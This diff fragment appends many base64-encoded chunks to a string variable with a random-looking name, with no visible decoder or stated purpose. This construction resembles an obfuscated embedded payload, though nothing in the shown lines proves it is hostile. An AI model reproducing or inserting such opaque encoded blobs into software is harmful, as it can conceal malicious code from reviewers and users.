+    englishmansdentist+="AKEAZAEAUFBOVAARAE1IjYo45GuyNme2TwiqynlZQ4on9SORnjh0U12zp2ki7XJm" + "\r\n"
+    englishmansdentist+="v2zGbUrWgNlvie48cjrb768kNqr8axgV7P03DlO9iHvTPhs8H+XkKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVhiqe9B5In8vMXkPKD1Phe" + "\r\n"
+    englishmansdentist+="zttl7ceUcq0XKMvBbKo2W0IDeQeN7Q8BdgKSoIkkKrOMSbOpTAXvfqyjnmg/bIHr" + "\r\n"
+    englishmansdentist+="lsGCiNarxLt4nOBO0e0rxXnnHwb2yf7a1rijg5rwbuqkPKnJ1SgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1Il/ULMiyao9MWQRaM8upGbtEXVOtaXzNKEceH9tdrQBYnAYOt" + "\r\n"
+    englishmansdentist+="5jhgzbkx6kd4FSsVhx6GJh4WC7/WikLxx88BgocIvsIoOw2iKAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXJ3ZF9sag97W4jGkE25VGwzNn5" + "\r\n"
+    englishmansdentist+="CS51C+pjTDRTlusEhPls3P5tc1G8g2p3QNtfmK97YfOt8Ozl8wkbPoL9JQhnpAeA" + "\r\n"
+    englishmansdentist+="5afQoQ5rRvBrdZvVGBLNW50bU4UOdcYnvVg+RAvM5B+Q1igAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1If5jXK3QJwlSKPGgLZ9xC2+JJQ2lLqhi8xB1N9B9GP6Q/OPwzlhgL" + "\r\n"
+    englishmansdentist+="18tkFnH6T6a0ovreBc4tK3uGLR1372tRF1KViQJq1dUVKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUayBAD9utuuuEXhKP2s11BD2QWpjmi" + "\r\n"
+    englishmansdentist+="rhtWMFlFPLMXdnCh6jcnhWLNS9m901u1kZrwPwRgnUWXMgv9rmryKaat/qynUgT0" + "\r\n"
+    englishmansdentist+="OA2zB4vqO62bX+6/GU5rqzEjVoo6qye1RrUXNq1e1ygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1Irx+K4xnmSwiDIC6p7HHx3JY/jv5N4BEKF96gzDELyy3u5t8LnUvGC8OV" + "\r\n"
+    englishmansdentist+="5OL6bZBGtWqmHSObrU2oNkmC74I2WzJCo3eOkS6iKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWU3o0y4Uk1ggxKjWB881PQHZVK3oyJ/kE2R" + "\r\n"
+    englishmansdentist+="Kih0YpcbQ77jyx5LMzVgk2hv5iA2N42H0FFNtmvcKcubqYixyo8r4fq9UW/NSWnP" + "\r\n"
+    englishmansdentist+="PpWsfugpB+hbXN/HNI7kSKZPi0Yg8VzUlV7b2CgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1IblI+9wKwa+EyqeNWFKAOBZhTezsZWCKTCAwXp3Fk1YcffCIoDldoSTqy7TIx" + "\r\n"
+    englishmansdentist+="Vnutlcfgru/IFwwNkzWeNyIvbXuOZOB9y/joKAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWW9yjgNGz6sFlAcaYk0HgmZk0LuoVCTY+ewVuPR" + "\r\n"
+    englishmansdentist+="hLhwFA9DFC1JH4q8gF0h3OZ9vDP+KE3OjoVOnwko33H+yP5cpuw/mOTE5G8OJn+J" + "\r\n"
+    englishmansdentist+="uxneFtrevhtrybaB+98J/nOvyaglLN0g2SgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="ug13Pf2WYyoILAbB3IsfNwo8ScEn4myACS7YHFHigV1B0eF/h1cWMcr1qQjh162d" + "\r\n"
+    englishmansdentist+="MLye31MfiMaUBxsmIIEZsJX7sNkCmEPLKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWWvvzD17fUYl1M7NKFuBD5mkwdngqT6BUN9elU38BIE" + "\r\n"
+    englishmansdentist+="9gPc5OwuoGgwiahwFI6Q2L0oBoEuJdIKBmZHK8YBBNd2uqT7j/MXGzqYA56O70kP" + "\r\n"
+    englishmansdentist+="9h3eD3AFD1WxZF1wAgI1o9N5eJHH2igAAAAAAAMVAKEAZAEAUFBOVAARAE1IwCcS" + "\r\n"
+    englishmansdentist+="V+VL9q38Ovb95Xie2NQ4esY3x1Ot7fi5Y4bCqco3IZblhYuYV0P2F4qfv6lEUml4" + "\r\n"
+    englishmansdentist+="jUOV48/qKM48zfMyFSPgVxoy2Ia4KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWV4nFkcD6mSzVk/shiV2hy+QR8FROuI+2d4xXDhSE+wSHrP" + "\r\n"
+    englishmansdentist+="EfSbNJ7b8+D4PuK43xFhyNwnH/rEzla9YPzXD+7DU7z3LFxl/SRU/H2gjVf1p+qU" + "\r\n"
+    englishmansdentist+="S1ZN2jGh/DwR8IxH+jItGDOR2ygAAAAAAAMVAKEAZAEAUFBOVAARAE1IDEjImM/H" + "\r\n"
+    englishmansdentist+="26iV5BSunHylCwW1zHndNdIMxSl+318dTMcN8AJ96QIhia2az5diAalKgCgLO4sx" + "\r\n"
+    englishmansdentist+="X16A8Adia441NG2CjVZK77A3KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWUotK8eTSZ/3Z7PSBLAN9fIaN8KmfS8TQTbHz70vmBkdgF9Hj+Z" + "\r\n"
+    englishmansdentist+="frha51nIcGbYxezLReKozHhTMbjwx3NEq3jM30FmSKgnSReLdLgWgzMbPKhx3f3n" + "\r\n"
+    englishmansdentist+="IXV5BjLRLvitko0UWsrH3CgAAAAAAAMVAKEAZAEAUFBOVAARAE1IB7iOOl3ZLQJS" + "\r\n"
+    englishmansdentist+="5y7kn74jUmaWQ2JvHt3PJs6/0I4oZ5xmYFSu4UwfgiogwOj4kcufi0q6O0n4X0Y7" + "\r\n"
+    englishmansdentist+="+nR38Q5L45/MxSU/lXQsKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWWTjf4PplfULsouPxyLEazH06uOK4B9Yw22N34WQYL31jltddtDgSSK" + "\r\n"
+    englishmansdentist+="tL2Y4dy8Cdas2lFbKu6OwtZeeMll8mOs7YEhqg6LiIkOAfo2i1iWPa8Taz+B4osE" + "\r\n"
+    englishmansdentist+="UIodScjDSxSxEF+W3SgAAAAAAAMVAKEAZAEAUFBOVAARAE1I8fa3Tbh9BoWFSmkG" + "\r\n"
+    englishmansdentist+="7F/w28XbBBGgjjpkMd44wqnv+oWCU1E2xE60Bmn7eoqeWGD13m2Nc2i/CrsROJS3" + "\r\n"
+    englishmansdentist+="HnkmI/Qx1/RqC3m3KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWV45qZtJxudI1UtoPp0AyesfMOzMYiNeuItK7x9CNkkY6GHuZAJT/W2Yrub" + "\r\n"
+    englishmansdentist+="xrG7m2Q4idK+gZrzBbXkVhMhZ++Td2NfLPchHtThvs40QtrW06SNGDLMkAOKvw3e" + "\r\n"
+    englishmansdentist+="NWbof6E0BjOv3igAAAAAAAMVAKEAZAEAUFBOVAARAE1IzUY0Z1vlaO1j26+42OKL" + "\r\n"
+    englishmansdentist+="p1zocUIiUn+zrRrfrroFtN+LAbwa+eeC5YC7YpWIpCSDP6V9wGNyRaX2PIGcmf5K" + "\r\n"
+    englishmansdentist+="w1QVpWuVhSFXKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
+    englishmansdentist+="TWUvBZeyE/G6crVUxmKnMCZnZx8/HQKYRaiA0EGXqYctwybGYSV/8hdnJARVTsNX" + "\r\n"
+    englishmansdentist+="AZ1NFl6nzoDcKoMNT61cuHjxSpozxH/d45wUUJptMriZOSH8iXiHajMm/CPyd3zy" + "\r\n"
+    englishmansdentist+="u/einus63ygAAAAAAAMVAKEAZAEAUFBOVAARAE1IaeWzlzxbcngRNKFvfzjTmVMV" + "\r\n"
+    englishmansdentist+="TsS4+7qQfRibLmh80+g9UQYld88a5y2qrLsxtbbWCkMfdKcInFp/CqM08GOaCqJm" + "\r\n"
+    englishmansdentist+="O1bN3zoHKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWX0" + "\r\n"
+    englishmansdentist+="BTrlIecYxiPBe+7fO/D8R7s/9L8PWJPod6GKakbm2oQ6r/poyT/MwWspNKQTg2pA" + "\r\n"
+    englishmansdentist+="JM+jf7yHSwfebGGfQ5k+nUVaUkjj4Qq2GMeIXJh+WoBCk7kENBW6nPy2yOqjMMmo" + "\r\n"
+    englishmansdentist+="KXCG4CgAAAAAAAMVAKEAZAEAUFBOVAARAE1IIT4ccHCv7YCVWXNMxxyz+EfISzby" + "\r\n"
+    englishmansdentist+="OYb18bf05bXtEYGEcG62Dx8V8Q1oZYx7wkVoalDh1/cJx2KBWpq8gqpCbiqUw1xR" + "\r\n"
+    englishmansdentist+="W5b7KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWgZrMo" + "\r\n"
+    englishmansdentist+="p01BX7gr+oFD303Sju04Rmx58MDvUXGlpWG+CFx7L/oD2IdxpUQd3RZF01U0X047" + "\r\n"
+    englishmansdentist+="fn/xPdnRMaAeOLvCbVQOo+mQ5YTLBzVhVr/+ObQexyRq4wfiG8cmKXjpqCcsKOeN" + "\r\n"
+    englishmansdentist+="4SgAAAAAAAMVAKEAZAEAUFBOVAARAE1IYp8NwetwmEaS4VwcgSX2SYrd0wMHc9nZ" + "\r\n"
+    englishmansdentist+="F4+CcxqxxuYZQ5Oa8/wMjQNCXuIt9ZHE3abnMR2WQhwERTMw3zwVqmayAcfxurEE" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWJgmG6cpu5" + "\r\n"
+    englishmansdentist+="bxOBt04Ffroe8y6HLU+RqZdFPLpOJDQZPaxOpxM6qPnudrujf4r+A9NEdz2BXw3B" + "\r\n"
+    englishmansdentist+="N1wsGXPsgjyQmlZhq4s3QbEDpewxpnVH/fRb74wxiP7Y99hMzNNJeCUsU6CF4igA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1Inufq6lycxhh1xBwntRMp9w9rcpgQo38zjq2V" + "\r\n"
+    englishmansdentist+="4d0IYO3O6LWayQVGMz9cfZfX41m0ZKWPVj/wuMbzY7982zqDeaHpyoE9R2fKKAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWV0LchoVRzW9c6s" + "\r\n"
+    englishmansdentist+="NbjMNuryC56RbvK82gPDJ70tUtcSaqmyz3vUEOM+DX2jM6fi72n8IQr6nmwYrQlf" + "\r\n"
+    englishmansdentist+="hfFHMxHlm/PBdKAhpFUGno38ZHuJJBw1jSz2Jdbma96F7wjaHl4zfjvD4ygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1Iq64vTc0iBRc9hmNk3qjs1srTmGAVd4ILJV3XOH9i" + "\r\n"
+    englishmansdentist+="PZ6RKnh4mZmFShySDrPu012ShmfOFk6FsevXScAisz42BZUHYHvMJvYoKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWMNwLjE5iBw0Hbyk+M" + "\r\n"
+    englishmansdentist+="56oMBD1JETI19b2lw6097mymCsQSohE/Xl2VuTLHk20ObaQw28ZDgPa6VVPjE+iw" + "\r\n"
+    englishmansdentist+="mkcOoc08mYoXYvpZcem3tORjvo7Odz1NsyMn2vUn/Ohp9x+pGP0q5CgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1IOzhkrzCsQNpO6F8k+syCzWwqP04gkGk3mhQ97QqmBLC6" + "\r\n"
+    englishmansdentist+="xKM09fy6XVEfmWn0jvIM3599sqpPRJ3rZATwlzpPbJtFydMIgzjpKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWX1DLDsp9bCVMvbvAO01QeB" + "\r\n"
+    englishmansdentist+="MaWfbtCcydqXxOKibWh8eKbGsdHgc81MgjY/tRbV5nncrtBp25dFxpPhaHvY3TJD" + "\r\n"
+    englishmansdentist+="6uYMCh821+B2jK4MUwIGZJXeubWFB3xElrk2/aEf7Mx4j5ZC5SgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1IgPiUTUhBHwmVF25uIRzn60HHEqrW9JWZxGst4S1tlvvPopUJ" + "\r\n"
+    englishmansdentist+="vEILfrPaDQRw01FrMcONnavFNn/rClKWDa2wfIAeW9nB/VMCKAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUnHLncmvxTXhfoZAWb4S+oZ1Go" + "\r\n"
+    englishmansdentist+="RUQP+M+nWUjRc3lH8BWuOPjjGLC1YS3uE0yL+9gplWeSJ9PnyQpVr0YMNJh0SG8t" + "\r\n"
+    englishmansdentist+="o7EpmSonkG9Ck4iGm9c9p2s0wl4IEhPD0O85Y3wyRCtp5igAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IlLyeOyQcEFRsKx9Dt6tvAg8zpuzMnaRbtCEmuvEcpyFI68I0u9vg" + "\r\n"
+    englishmansdentist+="UfdNeeq4WKjSgfhuqvcKVxMLBdC0SugF6adTZiMC6t+OKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWWATLh0crcqoYJ70DLzc8ls0Yi0q6Ws" + "\r\n"
+    englishmansdentist+="hzLBHFjhp2fsongRX4wjTax7MKVQQcn60CUS2YquGGdloMLxzxILddBxfQ1gpLKh" + "\r\n"
+    englishmansdentist+="17DK5NNbL84vRPite5lcKa81BwtkGzRJPyZNNxD35ygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1ItUg14MM5rM91H4UW3EAMB9UJbSwJKCEuzBbRLdMSMIhc1zvtqx+VsaQo" + "\r\n"
+    englishmansdentist+="ZDM+UzNekiGBCnaNbEQsHwtEKKHiI4rwQgVCpa3dKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWVkL0J0vzZKzkOXvaMeCCIfUKVUbX57vVjF" + "\r\n"
+    englishmansdentist+="QJKXalx/9wd9fAc1uxRPRpnZEPjwfEfcAQPwPbS0gUB2VGMxX/lxhWlZUpBBvJ2c" + "\r\n"
+    englishmansdentist+="YHitKCchDSOBS2Hs7yXGzUmfa8pPeHp/SggO6CgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1I86nXQ/MkHSPyDBqJF4pSmENS1xDwfmv6kli7EUCDnDmiY1+LnCk7YsqU35xT" + "\r\n"
+    englishmansdentist+="gyK3GI37D9DaoKgRK+r6uoQVGA9fto6VwCqjKAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWVJMU7vIdesKm/ZKz89NAlP6wKaxIe8VznJHKgt" + "\r\n"
+    englishmansdentist+="gkEoZyrjqvJrA8ugcfld5KtfVw/9ob/B5ak1cZeeaQysBWBwWzGi4MqCQxVzMwIK" + "\r\n"
+    englishmansdentist+="PUIrV0NRvhHDzGDgXHKRmwlx39PsKUi66SgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="etu7x+tV33+4wwfZ3eVelK6zeOolqygQMfOg5hVgHUdeosREg7o34ZHVVZUct8/8" + "\r\n"
+    englishmansdentist+="4e0EPyvklGlrA4NMNfMEFgps3FwDRJ+UKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
+    englishmansdentist+="AxUAoQBkAQBQUE5UABEATWXYcWvMcKesvD8db9HLRqlvoRxM5dONSYOs1WQsWFgj" + "\r\n"
+    englishmansdentist+="wFGYhQp5JvcQUd0T4456pK9nwLHppVmirSeJow+h5y9bZFPHIfggGftG3i30IbMq" + "\r\n"
+    englishmansdentist+="gfiERMqBEC6A/TXNsyNqnB4fsT8v6igAAAAAAAMVAKEAZAEAUFBOVAARAE1I3xDf" + "\r\n"
+    englishmansdentist+="TfnS39hasUIGOfeJTmnrbqhgkgENQ+KpiznP25ZB+YWb7XY+pDe1XiC0uuh3gLVV" + "\r\n"
+    englishmansdentist+="oSFbN1GW1vzuEs9/BVZorkFMijmyKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUA" + "\r\n"
+    englishmansdentist+="oQBkAQBQUE5UABEATWXgjl9/n3Cxlx68MqvAXWAD2VeoWbLY622IbGFh5Nu0qqSN" + "\r\n"
+    englishmansdentist+="gZ3SxhpHtdXFzmFkTe3r/CCoyxzJDGCgDuwyPnJ8+JF0tNN1RGXqXzLc00m2Idfp" + "\r\n"
+    englishmansdentist+="RH6w0bFjlCmOlViMIlp8/UrR6ygAAAAAAAMVAKEAZAEAUFBOVAARAE1IzTY4GYQ/" + "\r\n"
+    englishmansdentist+="CG+M50L508NbQmQ+HkABrSbYHKhYxfTAfr6Tz+XTdeQ65acsdRg3uhYsjKpxtalh" + "\r\n"
+    englishmansdentist+="evrvgJR/VEvyFKMRI03TRSdpKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBk" + "\r\n"
+    englishmansdentist+="AQBQUE5UABEATWXsBMRkhIiHNXll+CC8/Z8N7wU+mauc8jAdzLKB4N+P6cdiiBJo" + "\r\n"
+    englishmansdentist+="bDIfJMnqJY/HC93bMZ5qPzgzOs7gPb0Iu6YlUU0ImbMx+nQqOWKtmoihDiEM8Yxy" + "\r\n"
+    englishmansdentist+="KcogKjVRj9Fl/pNCx2S/7CgAAAAAAAMVAKEAZAEAUFBOVAARAE1IYiU0iNIdYOyH" + "\r\n"
+    englishmansdentist+="kaj+yZtS59EDQZhNs2XNAfKTgwTiuIyTH5N3D+TTYR281N+W9cSnGeN/JvhT25pu" + "\r\n"
+    englishmansdentist+="BssGorX4UJWBNiF1C4/OKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQ" + "\r\n"
+    englishmansdentist+="UE5UABEATWVWbT6n5Dk8RiRy2QuaEvtcKL917dFgCqXYNaU1SBNRQEqPZBG/hIp9" + "\r\n"
+    englishmansdentist+="9tYJVkbx98FZ0sLk8wi0cPqmziFpgboJQJIxndYEcFXFxjHhtAbjw150VU4M3K3X" + "\r\n"
+    englishmansdentist+="utMKIm7qWsOkb/ae7SgAAAAAAAMVAKEAZAEAUFBOVAARAE1IieuQGuCA3ktMXsGi" + "\r\n"
+    englishmansdentist+="tmEsXcQXik8EORY9i+miVwutaynQdntjzMMF9hgce+UL4LgJefTQkOrfGjihHu/s" + "\r\n"
+    englishmansdentist+="M1OzFl7ppg4s4fkYKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5U" + "\r\n"
+    englishmansdentist+="ABEATWXIX91bLcHNEiK/6Z2lWaWpODCF+vr0Vw18jXI9zauHob5aox4TW6kCZsMn" + "\r\n"
+    englishmansdentist+="vp27rut7z5M8datFeCy3IWSrgNVV+EFqjd2I8CmVWMGGWKiTI0i7J7LUG9qRCMDh" + "\r\n"
+    englishmansdentist+="NeBBdbcmUL1O7igAAAAAAAMVAKEAZAEAUFBOVAARAE1I17GzoaPf3s+JSh81Ha9C" + "\r\n"
+    englishmansdentist+="qnRs01NeEcutsl1mGZjMCVNxxWBLLb6FugxMfNgdeMW421FefiAO2haVxgeMTAWo" + "\r\n"
+    englishmansdentist+="0kA82c15aKixKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEA" + "\r\n"
+    englishmansdentist+="TWXe60WIHOZ+urUECKbiLvj3HPkm9+RO2E8JDmOddU4lZzXkdYeP0SLQ1UnJG+zq" + "\r\n"
+    englishmansdentist+="8C8C/PL6rgbEjLDGqe+487jUWYR23ZoeS2o5aQr5Jsl70jJbDgubkHubSXS/xXze" + "\r\n"
+    englishmansdentist+="DzzJlxlg7ygAAAAAAAMVAKEAZAEAUFBOVAARAE1IAbF8OAc3iiogVTRQuil0WEZb" + "\r\n"
+    englishmansdentist+="9NUMqSjpqZ+4Jyl4kaozgSY3hg1/VhQin03QA5Xl89oR2liIwevMzTVnPgN+HUiC" + "\r\n"
+    englishmansdentist+="lqkyy4TzKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXh" + "\r\n"
+    englishmansdentist+="yDDF0wxCe5KPlpG4tN4mHAfeFv6l5uMCuhAgo+CVQRjrOvNN8bOisPs5KdpeMbV0" + "\r\n"
+    englishmansdentist+="8geUh0w/88UxsGiePh9B4zz4YOTok7eNro4amjvViFlA2ZAYcVgHovOIoxFa8cEg" + "\r\n"
+    englishmansdentist+="ZpfW8CgAAAAAAAMVAKEAZAEAUFBOVAARAE1Idavk1As8FSb0iFZM+ql19hkVcZpU" + "\r\n"
+    englishmansdentist+="I4oxDztIV04tIWz8gSPktEI6UhUOmHky6dgGIr02ATXYkr7UaL5bl0yLgqI0IZW/" + "\r\n"
+    englishmansdentist+="Z0fvKAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWVLGfVR" + "\r\n"
+    englishmansdentist+="dMrwPOh+sEpPRmNBxvZh98+Rtbq1GShdB1R4lQ6ALNzrHZBkUu5bT1KUrPJ0gKIZ" + "\r\n"
+    englishmansdentist+="btJmCKkL3XkMxOwlAaRd7Gm0bI5pLhS1lQT+WI4lWnGT6UmYIXJa8fxxrMPnZhse" + "\r\n"
+    englishmansdentist+="8SgAAAAAAAMVAKEAZAEAUFBOVAARAE1IXHIsGGHlIuQZ0Nc98ZHIfgu69PHdNhaW" + "\r\n"
+    englishmansdentist+="qyGn47o7VcjkQFagkEQ1E4JGnLSl95aERjDo1dLM8vyUorc7ihJqHcgJXxV+BmI6" + "\r\n"
+    englishmansdentist+="KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUktpUe1BPV" + "\r\n"
+    englishmansdentist+="kF47i1MUNkGG28eYyZ1uIgp1xJ2h0WQqHPN5+hfTIwJ4F9gqvt/vrVZMcPXXWVSn" + "\r\n"
+    englishmansdentist+="RQF2WMFjL3RFkPHljiDw9dnUDvq2ngxWXFqBYfdOU49UKCK1PCawjAdFhl258igA" + "\r\n"
+    englishmansdentist+="AAAAAAMVAKEAZAEAUFBOVAARAE1IXdX+GKzjGyPdG75OHuhP/DiB1ntS1ckXPsQu" + "\r\n"
+    englishmansdentist+="evqsShJZpM5fWW+QL1Y80a5emh8M8XvkzoivjKH5yXeHUNqAXgjDfKU7ykpSKAAA" + "\r\n"
+    englishmansdentist+="AAAALGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXgE9/BhpUdh4lq" + "\r\n"
+    englishmansdentist+="hCaGxeN4yarq1ICRvqWCHYqmWhofRovIp5Wp3HUhLvfpI6RHlH9I1n7UdlypQRQi" + "\r\n"
+    englishmansdentist+="4eZohsoXfxZMA4N/Q9I1YbYt6V9W2zhEhcW8zMnIJMvStsBG9hAVNVWn8ygAAAAA" + "\r\n"
+    englishmansdentist+="AAMVAKEAZAEAUFBOVAARAE1IeJGD2iNg6XMERL4EgnW9qJJ5lSJJnxYmZZMtw8nq" + "\r\n"
+    englishmansdentist+="uOiSMSC/njv180s5Uq07clJHzgVoeD+lzRb7r+UURoHN+ISE6VR4wKpqKAAAAAAA" + "\r\n"
+    englishmansdentist+="LGQAlgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWW4gnncncrMNvwbhD/q" + "\r\n"
+    englishmansdentist+="coEo2uqBJ1jQXc2rt5esqEhLZfRyhtsMlynOTmkbM1kdJsj3k0Jm8zSPJg39yC1S" + "\r\n"
+    englishmansdentist+="r3cuTVu0PA94xTaYqDpXvkkOMfgHV4s8jvaFUJkHerpcPuK1oCfW9CgAAAAAAAMV" + "\r\n"
+    englishmansdentist+="AKEAZAEAUFBOVAARAE1IXJVmVFyf4Pd2JAFbI6jUknNMjz3MzcGDVD4VYc6p483L" + "\r\n"
+    englishmansdentist+="oD7bvhP0qQdZJAtp4r3CDGK6ZHrkUIK1yNhW2ePfimDQ4EuR1UFHKAAAAAAALGQA" + "\r\n"
+    englishmansdentist+="lgAGc3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWUdKgrNZir0qZhNRdn+OfL1" + "\r\n"
+    englishmansdentist+="ov3ML8fH9r1G5k/gTL9384lVqvpZ+Eoc2hFhRKYj1KYDYaImLNPmZcws7qoPtDQe" + "\r\n"
+    englishmansdentist+="TyVmrC7TcTi3OakTZQ0BpOQFajtGjlzAdG6Re5yc/XSNbQrH9SgAAAAAAAMVAKEA" + "\r\n"
+    englishmansdentist+="ZAEAUFBOVAARAE1IdUYJYz7aI3rSXnFFg3ijOPmK51jYB2zpamg/9pKHwfdp4JdN" + "\r\n"
+    englishmansdentist+="ppM4fTeRCSo93zSr1lwFAsjXIF6NEk3o0lUst+pAjOdMhbjdKAAAAAAALGQAlgAG" + "\r\n"
+    englishmansdentist+="c3lzdGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWV6IYw8md9n8BGiF883R7ACx5lh" + "\r\n"
+    englishmansdentist+="1etCRj2GCTx2t13kMDKTq6lPpfEohgdkLTxFkMR9CqORoEB5jmbk4XqWUF3Dl3UC" + "\r\n"
+    englishmansdentist+="6THo8Tu6OCC7HE2TZr9zHTjdyJd9a4eqwr8cLb6TXAu+9igAAAAAAAMVAKEAZAEA" + "\r\n"
+    englishmansdentist+="UFBOVAARAE1IQefr197sZXM+W/pjRe/BLbnf2pgWrZ5mMgLFBKzlMy6mac16xuI4" + "\r\n"
+    englishmansdentist+="izn5bg5uoG8ZcA7gQYsYuMIVzQhFF7fFiLS67GDu5X6FKAAAAAAALGQAlgAGc3lz" + "\r\n"
+    englishmansdentist+="dGVtKAAAAAAAAxUAoQBkAQBQUE5UABEATWXGPPlyQq3o9GZmtZielNF8tdYv869/" + "\r\n"
+    englishmansdentist+="AmbjsQWTf8AOK8izGW5wTNn7JoLJjc30s4KJ+OhX+u/+pdKtPedDTZ2NSIelpFKw" + "\r\n"
+    englishmansdentist+="17Bmh/bTNhcKCjOYS20iyMxvSpMe8LJrzwl6XOp/9ygAAAAAAAMVAKEAZAEAUFBO" + "\r\n"
+    englishmansdentist+="VAARAE1I5B5e2wMdfOmi2W2QdZ/PCvnOVTM90qAV6AEyPbhjlzLP3dCWAXUEFYMq" + "\r\n"
+    englishmansdentist+="WdtBglnA/M51qb9jI3is+jMWhVO+t2VEfDmKSZ9eKAAAAAAALGQAlgAGc3lzdGVt" + "\r\n"
+    englishmansdentist+="KAAAAAAAAxUAoQBkAQBQUE5UABEATWXz/Tf7qEIx9FCg6NEav2UQaVUtwItv5NGa" + "\r\n"
+    englishmansdentist+="p5Vq99/GnrZOT0XwXQzIwB1b9KrvmpA6C2S8nn7rDg9nNhHE/l1xMR7dVH3iBTC9" + "\r\n"
+    englishmansdentist+="LFugCYRSfNQnAcm10Ci8C+5kZpP9qDl4ev0Q+CgAAAAAAAMVAKEAZAEAUFBOVAAR" + "\r\n"
+    englishmansdentist+="AE1I2mie3Ga6YKzrko0cpLcV7/ZATPd/sQviM7JcJkVztaXACMZQerzLPDS0r4G1" + "\r\n"
+    englishmansdentist+="0pqCrSh5pAIm+02Wf44q9yrxjBFlytFqNOWxKAAAAAAALGQAlgAGc3lzdGVtKAAA" + "\r\n"
+    englishmansdentist+="AAAAAxUAoQBkAQBQUE5UABEATWXqF4aEvJh3HUd3Nm3Rzvet2k/FBpm6jIDNrmxt" + "\r\n"
+    englishmansdentist+="RSHcwT9kRMcaM2+dY5lxw9k0oFpGluM631ZBiSqYyfvJk8liitKJsc3KODDBiYPh" + "\r\n"
+    englishmansdentist+="o+iC7EJNQBUhLrXydl9tHVygrdJMI1p0+SgAAAAAAAMVAKEAZAEAUFBOVAARAE1I" + "\r\n"
+    englishmansdentist+="i55tR0/EK81shBJNY/eSrF57eFU3xE82A2Numy+YJgqj6IqaG1iLThKpqaNrnffb" + "\r\n"
+    englishmansdentist+="QoQBjA8YxnR4Bd2MAwW8LxjzBC9i0Dr5KAAAAAAALGQAlgAGc3lzdGVtKAAAAAAA" + "\r\n"
